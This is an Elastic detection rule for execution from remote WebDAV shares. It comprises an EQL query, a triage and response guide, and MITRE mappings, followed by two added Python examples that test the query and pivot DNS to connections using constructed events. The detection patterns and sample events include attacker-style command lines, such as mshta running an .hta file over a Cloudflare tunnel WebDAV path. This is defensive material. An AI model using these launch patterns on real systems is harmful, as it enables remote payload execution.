Suspicious Execution from a WebDav Share

Identifies attempts to execute or invoke content from remote WebDAV shares. Adversaries may abuse WebDAV paths, public tunnels, or host@port UNC paths to run tools or scripts while reducing local staging on the victim file system.

Elastic rule (View on GitHub)

[metadata]
creation_date = "2025/08/19"
integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
maturity = "production"
updated_date = "2026/05/03"

[rule]
author = ["Elastic"]
description = """
Identifies attempts to execute or invoke content from remote WebDAV shares. Adversaries may abuse WebDAV paths,
public tunnels, or host@port UNC paths to run tools or scripts while reducing local staging on the victim file system.
"""
false_positives = [
    "Trusted WebDAV content when the command namespace, parent, utility identity, signer, user/host scope, and child/artifact/destination evidence align with a recognized workflow"
]
from = "now-9m"
index = [
    "endgame-*",
    "logs-crowdstrike.fdr*",
    "logs-endpoint.events.process-*",
    "logs-m365_defender.event-*",
    "logs-sentinel_one_cloud_funnel.*",
    "logs-system.security*",
    "logs-windows.forwarded*",
    "logs-windows.sysmon_operational-*",
    "winlogbeat-*",
]
language = "eql"
license = "Elastic License v2"
name = "Suspicious Execution from a WebDav Share"
risk_score = 73
rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0"
severity = "high"
tags = [
    "Domain: Endpoint",
    "OS: Windows",
    "Use Case: Threat Detection",
    "Tactic: Execution",
    "Data Source: Elastic Endgame",
    "Data Source: Elastic Defend",
    "Data Source: Windows Security Event Logs",
    "Data Source: Microsoft Defender XDR",
    "Data Source: Sysmon",
    "Data Source: SentinelOne",
    "Data Source: Crowdstrike",
    "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"

query = '''
process where host.os.type == "windows" and event.type == "start" and
 process.name : ("cmd.exe", "powershell.exe", "conhost.exe", "wscript.exe", "mshta.exe", "curl.exe", "msiexec.exe", "bitsadmin.exe", "net.exe") and
 process.command_line : ("*trycloudflare.com*", "*@SSL\\*", "*\\webdav\\*", "*\\DavWWWRoot\\*", "*\\\\*.*@8080\\*", "*\\\\*.*@80\\*", "*\\\\*.*@8443\\*", "*\\\\*.*@443\\*") and
 not (process.name : "cmd.exe" and process.args : "\\\\?\\UNC\\*.sharepoint.com@SSL\\DavWWWRoot\\*")
'''

note = """## Triage and analysis

### Investigating Suspicious Execution from a WebDav Share

#### Possible investigation steps

- Does the alert command line show direct WebDAV execution, and external delivery vs internal transfer?
  - Focus: `process.command_line`, `process.name`, and `process.executable`; separate public tunnel or tenant paths from internal host@port UNC, "@SSL", "DavWWWRoot", or high-port paths.
  - Implication: escalate when a script host, installer, shell, transfer tool, or net.exe points to public WebDAV content or an unrelated internal transfer host; lower concern when path maps to one recognized internal tenant, vendor, or deployment namespace for that role.

- Do the launcher identity and parent lineage match that exact workflow?
  - Focus: `process.executable`, `process.code_signature.subject_name`, `process.code_signature.trusted`, `process.parent.executable`, and `process.parent.command_line`.
  - Implication: escalate when a signed utility proxies execution from a browser, Office app, chat client, archive tool, or unexplained service context. Public paths from user-facing parents suggest user delivery; internal host@port paths or net.exe share activity suggest lateral transfer. Lower concern when signer, parent, path, host, and user recur as one recognized collaboration, deployment, or support workflow; identity alone does not clear remote execution.

- Did the alerting process spawn follow-on execution or share-mount activity?
  - Focus: child or sibling process starts on `host.id` where `process.parent.entity_id` matches `process.entity_id`; check shells, downloaders, installers, schedulers, net.exe, or user-writable `process.executable` paths. $investigate_2
  - Hint: if `process.entity_id` is unavailable, use `host.id`, `process.pid`, and a tight alert-time window; PID lineage is weaker because of reuse.
  - Implication: escalate when the launcher spawns download, install, persistence, or share-mapping tied to the same path; narrow scope when the chain ends cleanly inside one recognized workflow.

- Did file telemetry show local staging or later execution from the WebDAV launch?
  - Focus: if file telemetry exists, query `host.id` plus `process.entity_id` for `file.path`, `file.origin_url`, `file.Ext.windows.zone_identifier`, and later starts where `process.executable` matches a written path. $investigate_3
  - Hint: if WebDAV content is copied locally or to a mapped drive before execution, treat it as the same delivery chain and keep original-process scope.
  - Range: start with the alert window; expand only after a suspicious write to confirm later execution.
  - Implication: escalate when the chain writes scripts, installers, renamed payloads, or startup material in user-writable paths. Missing file telemetry is unresolved, not benign; direct WebDAV execution may leave few local artifacts.

- Did DNS or connection telemetry confirm the WebDAV endpoint or delivery infrastructure?
  - Focus: if network telemetry exists, separate DNS events (`dns.question.name`, `dns.resolved_ip`) from connection events (`destination.ip`, `destination.port`) for the same `host.id` and `process.entity_id`. $investigate_4
  - Hint: use DNS lookup_result events to map `dns.resolved_ip` to later `destination.ip` before tying a domain to a connection. Missing network telemetry is unresolved, not benign.
  - Implication: escalate when the process reaches public tunnels, rare external domains, high-port WebDAV services, or destinations unrelated to the signer and parent workflow; lower concern when the endpoint matches the command line's recognized tenant, internal share, or vendor.

- If local evidence is suspicious or unresolved, do related alerts show the same WebDAV delivery or transfer pattern?
  - Focus: related alerts for `user.id` over 48 hours, checking reused WebDAV path, launcher, destination, or follow-on artifact. $investigate_0
  - Hint: if user scope is quiet or ambiguous, check `host.id` for whether the path stays local or appears with other execution or download alerts. $investigate_1
  - Implication: broaden scope when the same path, domain, launcher, or artifact pattern appears beyond one recognized workflow; keep the case local when related-alert history is confined to that workflow.

- Escalate on direct remote WebDAV execution plus suspicious launcher, lineage, child, artifact, destination, or related-alert evidence; close only when process evidence and recovery align to one exact recognized workflow; preserve and escalate when answers conflict or visibility is incomplete.

### False positive analysis

- Tenant collaboration portals, internal WebDAV shares, and vendor content portals can trigger when `process.command_line` namespace, `process.parent.executable`, `process.executable`, signer, `user.id`, and `host.id` converge on one recognized workflow. Close only when telemetry shows parent, path, utility, user, and host stable across prior rule alerts and no child, artifact, or destination evidence contradicts the portal workflow. Use portal allowlists or owner records as corroboration, not substitutes.
- Deployment or remote-support tooling can run msiexec.exe, powershell.exe, cmd.exe, or bitsadmin.exe against WebDAV-hosted packages. Confirm only when a management-agent or support-console parent, utility identity, signer, package namespace, written-artifact pattern, and host/user scope fit the same workflow. Public tunnel paths, renamed payloads, unexpected children, or one-off standard-user launches remain suspicious unless externally confirmed with no telemetry contradictions.
- Before creating an exception, use the minimum confirmed workflow pattern: stable `process.code_signature.subject_name` or `process.executable`, `process.parent.executable`, specific `process.command_line` namespace or destination pattern, and proving `user.id` or `host.id` scope. Avoid exceptions on `process.name`, `user.name`, "@SSL", or "DavWWWRoot" alone.

### Response and remediation

- If confirmed benign, reverse temporary containment and document the command-line namespace, parent launcher, utility identity, signer, available destination or artifact evidence, and `user.id` / `host.id` scope that validated the workflow. Create an exception only after the same scoped pattern is stable across prior rule alerts.
- If suspicious but unconfirmed, preserve the alert export, process tree, `process.entity_id`, `process.command_line`, `process.parent.command_line`, remote path, staged artifacts, and destination indicators before containment. First apply reversible containment, such as temporarily blocking the confirmed WebDAV namespace or increasing monitoring on affected `host.id` and `user.id`; avoid termination or deletion until child execution, payload staging, or repeated suspicious destinations indicate active compromise.
- If confirmed malicious, isolate the host when feasible or terminate the alerting process after evidence capture. If identity evidence suggests account misuse, contain or reset the affected account with identity owners. If direct endpoint response is unavailable, hand off preserved process, artifact, destination, host, and user evidence to the team able to contain the host or account.
- Block confirmed malicious domains, destination IPs, hashes, executable paths, and staged artifact paths. Review other hosts and users for the same `process.parent.executable` plus `process.command_line` plus destination pattern, then remove only staged scripts, installers, startup material, or persistence changes tied to the chain.
- Post-incident hardening: restrict unnecessary WebDAV and WebClient usage, limit direct execution from remote shares by script hosts and installers, use application control or attack surface reduction where feasible, retain file and network telemetry for this workflow, and document variants such as mapped-drive execution, copied-local execution, and alternate script-host launchers.
"""

setup = """## Setup

This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.

Setup instructions: https://ela.st/install-elastic-defend

### Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:

- [CrowdStrike](https://ela.st/crowdstrike-integration)
- [Microsoft Defender XDR](https://ela.st/m365-defender)
- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
"""

[rule.investigation_fields]
field_names = [
    "@timestamp",
    "host.name",
    "host.id",
    "user.id",
    "process.entity_id",
    "process.pid",
    "process.name",
    "process.executable",
    "process.command_line",
    "process.parent.executable",
    "process.parent.command_line",
    "process.code_signature.subject_name",
    "process.code_signature.trusted",
]

[transform]

[[transform.investigate]]
label = "Alerts associated with the user"
description = ""
providers = [
  [
    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
    { excluded = false, field = "user.id", queryType = "phrase", value = "{{user.id}}", valueType = "string" }
  ]
]
relativeFrom = "now-48h/h"
relativeTo = "now"

[[transform.investigate]]
label = "Alerts associated with the host"
description = ""
providers = [
  [
    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
  ]
]
relativeFrom = "now-48h/h"
relativeTo = "now"

[[transform.investigate]]
label = "Child process events from the WebDAV launcher"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "File events from the WebDAV launcher"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "Network events from the WebDAV launcher"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1204"
name = "User Execution"
reference = "https://attack.mitre.org/techniques/T1204/"

[[rule.threat.technique.subtechnique]]
id = "T1204.002"
name = "Malicious File"
reference = "https://attack.mitre.org/techniques/T1204/002/"

[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1021"
name = "Remote Services"
reference = "https://attack.mitre.org/techniques/T1021/"

[[rule.threat.technique.subtechnique]]
id = "T1021.002"
name = "SMB/Windows Admin Shares"
reference = "https://attack.mitre.org/techniques/T1021/002/"

[[rule.threat.technique]]
id = "T1570"
name = "Lateral Tool Transfer"
reference = "https://attack.mitre.org/techniques/T1570/"

[rule.threat.tactic]
id = "TA0008"
name = "Lateral Movement"
reference = "https://attack.mitre.org/tactics/TA0008/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1071"
name = "Application Layer Protocol"
reference = "https://attack.mitre.org/techniques/T1071/"

[[rule.threat.technique.subtechnique]]
id = "T1071.001"
name = "Web Protocols"
reference = "https://attack.mitre.org/techniques/T1071/001/"

[[rule.threat.technique]]
id = "T1105"
name = "Ingress Tool Transfer"
reference = "https://attack.mitre.org/techniques/T1105/"

[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
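The rule's EQL query re-implemented as a small Python evaluator and run over constructed process-start events, so the wildcard semantics of the `:` operator and the cmd.exe/SharePoint exclusion can be checked offline. This is an added example, not Elastic's code; the host names, the tunnel label and the "contoso" tenant are made up. It also surfaces a caveat the patterns carry as written: the host@port patterns need a "." between the leading "\\" and "@port\", so a short host name without a domain suffix does not match them.

```python
import re

# Added example, not Elastic's code: the rule's EQL query re-implemented so its
# wildcard logic and the SharePoint exclusion can be run over constructed events.
# Launcher names and patterns are copied from the rule; Python's "\\" escaping
# coincides with EQL's, so each literal below is the pattern the rule evaluates.
LAUNCHERS = {"cmd.exe", "powershell.exe", "conhost.exe", "wscript.exe", "mshta.exe",
             "curl.exe", "msiexec.exe", "bitsadmin.exe", "net.exe"}
CMDLINE_PATTERNS = [
    "*trycloudflare.com*", "*@SSL\\*", "*\\webdav\\*", "*\\DavWWWRoot\\*",
    "*\\\\*.*@8080\\*", "*\\\\*.*@80\\*", "*\\\\*.*@8443\\*", "*\\\\*.*@443\\*",
]
SHAREPOINT_EXCLUSION = "\\\\?\\UNC\\*.sharepoint.com@SSL\\DavWWWRoot\\*"


def eql_wildcard(pattern: str) -> "re.Pattern[str]":
    """Compile an EQL ':' pattern: '*' matches any run of characters, '?' one
    character, everything else is literal, and the comparison ignores case."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.compile(regex, re.IGNORECASE | re.DOTALL)


CMDLINE_RES = [eql_wildcard(p) for p in CMDLINE_PATTERNS]
SHAREPOINT_RE = eql_wildcard(SHAREPOINT_EXCLUSION)


def matches_rule(event: dict) -> bool:
    """True when a process-start event satisfies the rule's 'process where' query."""
    if event.get("host.os.type") != "windows" or event.get("event.type") != "start":
        return False
    name = event.get("process.name", "").lower()
    if name not in LAUNCHERS:
        return False
    if not any(r.fullmatch(event.get("process.command_line", "")) for r in CMDLINE_RES):
        return False
    # Exclusion: cmd.exe given a SharePoint tenant path in the \\?\UNC\ WebClient
    # form. process.args is an array; EQL ':' matches if any element matches.
    if name == "cmd.exe" and any(SHAREPOINT_RE.fullmatch(a) for a in event.get("process.args", [])):
        return False
    return True


def _evt(name: str, cmdline: str) -> dict:
    """Build a minimal process-start event; args are a naive split of the command line."""
    return {"host.os.type": "windows", "event.type": "start", "process.name": name,
            "process.command_line": cmdline, "process.args": cmdline.split()}


# Constructed sample events; host names, the tunnel label and the "contoso" tenant are made up.
SAMPLES = {
    # public tunnel plus @SSL and DavWWWRoot: three patterns hit at once
    "mshta_tunnel": _evt("mshta.exe", r"mshta.exe \\random-words.trycloudflare.com@SSL\DavWWWRoot\update.hta"),
    # internal host@port UNC with a dotted host name
    "ps_highport": _evt("powershell.exe", r"powershell.exe -File \\files01.corp.example@8080\share\deploy.ps1"),
    # same launch, but the short host name has no '.', so "*\\*.*@8080\*" cannot match
    "ps_shortname": _evt("powershell.exe", r"powershell.exe -File \\files01@8080\share\deploy.ps1"),
    # cmd.exe opening a SharePoint document through the WebClient UNC form: excluded
    "cmd_sharepoint": _evt("cmd.exe", r"cmd.exe /c start \\?\UNC\contoso.sharepoint.com@SSL\DavWWWRoot\sites\doc.docx"),
    # same tenant path but a different launcher: the exclusion is scoped to cmd.exe
    "wscript_sharepoint": _evt("wscript.exe", r"wscript.exe \\?\UNC\contoso.sharepoint.com@SSL\DavWWWRoot\sites\tool.vbs"),
    # explorer.exe is not in the rule's launcher list
    "explorer": _evt("explorer.exe", r"explorer.exe \\files01.corp.example@443\DavWWWRoot\docs"),
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """Map each sample label to whether the rule would alert on it."""
    return {label: matches_rule(ev) for label, ev in samples.items()}


if __name__ == "__main__":
    for label, hit in evaluate().items():
        print(f"{'ALERT ' if hit else 'ignore'} {label}")
```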
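The DNS-to-connection pivot from the investigation guide (scope by `host.id` and `process.entity_id`, remember what each lookup_result resolved to, then label later `destination.ip` values by domain) as a worked example. This is added code, not Elastic's; the alert, events, IPs, host names and entity ids are constructed, and the `event.action` values are assumptions that the logic does not depend on beyond `lookup_result`.

```python
from datetime import datetime

# Added example, not Elastic's code. Constructed alert and network events for one
# host; IPs are documentation ranges, names and entity ids are made up.
ALERT = {"@timestamp": "2025-08-19T10:00:00Z", "host.id": "host-A", "process.entity_id": "proc-42",
         "process.command_line": r"mshta.exe \\random-words.trycloudflare.com@SSL\DavWWWRoot\update.hta"}

EVENTS = [
    # DNS answer seen by the alerting process; dns.resolved_ip is an array in ECS
    {"@timestamp": "2025-08-19T10:00:01Z", "host.id": "host-A", "process.entity_id": "proc-42",
     "event.category": "network", "event.action": "lookup_result",
     "dns.question.name": "random-words.trycloudflare.com", "dns.resolved_ip": ["203.0.113.10"]},
    # connection by the same process to the address just resolved
    {"@timestamp": "2025-08-19T10:00:02Z", "host.id": "host-A", "process.entity_id": "proc-42",
     "event.category": "network", "event.action": "connection_attempted",
     "destination.ip": "203.0.113.10", "destination.port": 443},
    # connection with no prior lookup from this process (IP literal or cached answer)
    {"@timestamp": "2025-08-19T10:00:03Z", "host.id": "host-A", "process.entity_id": "proc-42",
     "event.category": "network", "event.action": "connection_attempted",
     "destination.ip": "198.51.100.7", "destination.port": 8080},
    # a different process on the same host resolves that IP: must not be attributed to the alert
    {"@timestamp": "2025-08-19T10:00:04Z", "host.id": "host-A", "process.entity_id": "proc-99",
     "event.category": "network", "event.action": "lookup_result",
     "dns.question.name": "update.example", "dns.resolved_ip": ["198.51.100.7"]},
]


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def pivot(alert: dict, events: list, window_minutes: int = 60) -> list:
    """Return one row per connection made by the alerting process, naming the domain
    whose earlier lookup_result resolved to destination.ip (None when no lookup is
    seen) and whether that domain appears in the alert's command line."""
    start = _ts(alert["@timestamp"])
    scoped = [e for e in events
              if e["host.id"] == alert["host.id"]
              and e["process.entity_id"] == alert["process.entity_id"]
              and e.get("event.category") == "network"
              and 0 <= (_ts(e["@timestamp"]) - start).total_seconds() <= window_minutes * 60]
    resolved = {}  # destination IP -> most recent domain that resolved to it
    rows = []
    for e in sorted(scoped, key=lambda e: e["@timestamp"]):
        if e.get("event.action") == "lookup_result":
            for ip in e.get("dns.resolved_ip", []):
                resolved[ip] = e["dns.question.name"]
        elif "destination.ip" in e:
            domain = resolved.get(e["destination.ip"])
            rows.append({"destination.ip": e["destination.ip"],
                         "destination.port": e["destination.port"],
                         "domain": domain,
                         "in_command_line": domain is not None
                         and domain.lower() in alert["process.command_line"].lower()})
    return rows


if __name__ == "__main__":
    for row in pivot(ALERT, EVENTS):
        print(row)
```

A connection row with no domain is the unresolved case the guide warns about: it is evidence still to be explained, not a benign result.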
